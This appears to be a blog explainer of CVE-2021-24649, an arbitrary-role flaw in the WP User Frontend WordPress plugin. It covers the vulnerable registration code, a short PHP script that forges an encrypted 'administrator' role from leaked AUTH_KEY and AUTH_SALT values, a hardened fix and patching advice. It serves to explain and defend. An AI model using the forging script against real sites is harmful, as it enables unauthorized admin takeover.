WordPress is one of the world’s most popular content management systems, but its huge ecosystem of plugins can also introduce serious security risks. In this post, we’ll break down CVE-2021-24649, a critical vulnerability in the WP User Frontend plugin. We’re going to see how this bug lets an attacker become an admin just by crafting a single, not-so-hidden value in a registration form — if they can get their hands on the right secret keys.
We’ll explain how the vulnerability works, show you real code snippets, tell you where to find the original info, and walk through a simple exploit, all in plain English.
What is CVE-2021-24649?
CVE-2021-24649 affects WP User Frontend versions before 3.5.29. This plugin lets you build custom registration forms. One of the fields it supports is urhidden, which is an encrypted value that actually controls the new user’s role (like subscriber, author, admin, etc).
The problem? The plugin trusts the encrypted value passed in urhidden — and the encryption is based on WordPress constants: AUTH_KEY and AUTH_SALT. If an attacker can get those keys (by reading config files or if the site is using known, default keys), they can create their own encrypted value for any role — even admin.
Let’s break it down
1. User Registration Form: WPUF lets you register users from the frontend. It uses a hidden field called urhidden in the form, which contains the user role — encrypted.
2. Encryption with Predictable Keys: The encryption uses WP’s AUTH_KEY and AUTH_SALT from wp-config.php. If you know these, you can create *any* encrypted value you want.
3. No Server-Side Role Check: The server trusts whatever role comes back from the form as long as it decrypts successfully. No extra check!
This is the relevant code (from /class/frontend-account.php):
    // Encrypt role in urhidden
    $role = $settings['role']; // The role to assign to user
    $encrypted_role = wpuf_encryption($role);
    // Later, on registration
    if ( isset( $_POST['urhidden'] ) ) {
        $dec_role = wpuf_encryption( sanitize_text_field( $_POST['urhidden'] ), 'd' );
        $userdata['role'] = $dec_role;
    }
If you control $_POST['urhidden'] and know the encryption scheme, you control the user role!
The plugin's wpuf_encryption() is something like:
    function wpuf_encryption( $data, $action = 'e' ) {
        $key = AUTH_KEY . AUTH_SALT;
        if ( $action == 'e' ) {
            return base64_encode( openssl_encrypt( $data, 'AES-256-CBC', $key, 0, substr( $key, 0, 16 ) ) );
        } else {
            return openssl_decrypt( base64_decode( $data ), 'AES-256-CBC', $key, 0, substr( $key, 0, 16 ) );
        }
    }
Suppose an attacker finds a local file inclusion bug elsewhere and reads wp-config.php:
define('AUTH_KEY', 'somerandomstring123…');
define('AUTH_SALT', 'anotherrandomstring456…');
Now, on their local machine, they run a simple PHP script:
    <?php
    $key = 'somerandomstring123…anotherrandomstring456…'; // AUTH_KEY . AUTH_SALT
    $iv = substr( $key, 0, 16 );
    $role = 'administrator';
    $encrypted = base64_encode( openssl_encrypt( $role, 'AES-256-CBC', $key, 0, $iv ) );
    echo $encrypted;
Suppose this prints something like:
D7lyvuNKCredUI8J7J70qg==
4. WPUF Processes the Registration
WPUF decrypts urhidden, sees administrator, and makes the new user an admin.
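The fix a defender wants is for the server to stop trusting the client's value at all. Below is an added example (not the plugin's own code, and not the actual 3.5.29 patch) of a hardened version of the registration snippet above: the role always comes from the form's server-side settings, urhidden is only accepted if it decrypts to exactly that configured role, and privileged roles are refused outright. The function name wpuf_resolve_registration_role(), the forbidden-role list and the key values are assumptions; wpuf_encryption() and $settings['role'] are taken from the post.

```php
<?php
// Constructed demo keys, not a real site's AUTH_KEY / AUTH_SALT.
define( 'AUTH_KEY',  'constructed-demo-auth-key-0123456789abcdef' );
define( 'AUTH_SALT', 'constructed-demo-auth-salt-fedcba9876543210' );

// Same scheme the post describes, with the dropped "0" arguments restored.
function wpuf_encryption( $data, $action = 'e' ) {
    $key = AUTH_KEY . AUTH_SALT;
    $iv  = substr( $key, 0, 16 );
    if ( $action == 'e' ) {
        return base64_encode( openssl_encrypt( $data, 'AES-256-CBC', $key, 0, $iv ) );
    }
    return openssl_decrypt( base64_decode( $data ), 'AES-256-CBC', $key, 0, $iv );
}

// Roles a public registration form may never hand out, whatever the client sends (assumption).
const WPUF_FORBIDDEN_ROLES = array( 'administrator', 'editor' );

// Hardened handler (hypothetical name). Returns the role to assign, or null to
// reject the registration because urhidden did not match the server-side setting.
function wpuf_resolve_registration_role( array $settings, $posted_urhidden ) {
    // The authoritative role is the one stored with the form, never the POST body.
    $configured = isset( $settings['role'] ) ? $settings['role'] : 'subscriber';
    if ( in_array( $configured, WPUF_FORBIDDEN_ROLES, true ) ) {
        $configured = 'subscriber'; // misconfigured form: fail closed
    }
    if ( $posted_urhidden === null ) {
        return $configured;
    }
    $dec_role = wpuf_encryption( $posted_urhidden, 'd' );
    // A forged or stale urhidden (decrypt failure, or any role other than the
    // configured one) is a tampering signal: reject it and log it in production.
    if ( $dec_role === false || ! hash_equals( $configured, $dec_role ) ) {
        return null;
    }
    return $configured;
}

// Demo: the configured role passes, a forged "administrator" value is rejected.
$settings = array( 'role' => 'subscriber' );
var_dump( wpuf_resolve_registration_role( $settings, wpuf_encryption( 'subscriber' ) ) );    // string "subscriber"
var_dump( wpuf_resolve_registration_role( $settings, wpuf_encryption( 'administrator' ) ) ); // NULL
```

Even with AUTH_KEY and AUTH_SALT fully leaked, the forged value buys nothing here, because the decrypted string is compared against what the server already knows rather than used directly.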
Original References
- WPScan: WP User Frontend < 3.5.29 - Arbitrary Role Assignment via urhidden parameter
- Patch Diff / GitHub Issue
- WordPress Plugin Directory - WP User Frontend
How to Protect Your Site
- Update the WP User Frontend plugin to the latest version.
- Never use default or published keys in your wp-config.php; always generate unique ones from https://api.wordpress.org/secret-key/1.1/salt/
- Fix or mitigate any file read or inclusion vulnerabilities FIRST, so attackers cannot get your configuration.
Conclusion
CVE-2021-24649 is a textbook example of how *assuming encryption is enough* is *never* safe when the key management and input validation aren’t strict. If your plugin lets users send back encrypted data and assumes it’s trustworthy, you’re putting your site at serious risk — especially if your config keys leak.
If you use WP User Frontend, update now and review your site security. Never share or reuse your site’s crypto keys.
Timeline
Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 15:43:00 UTC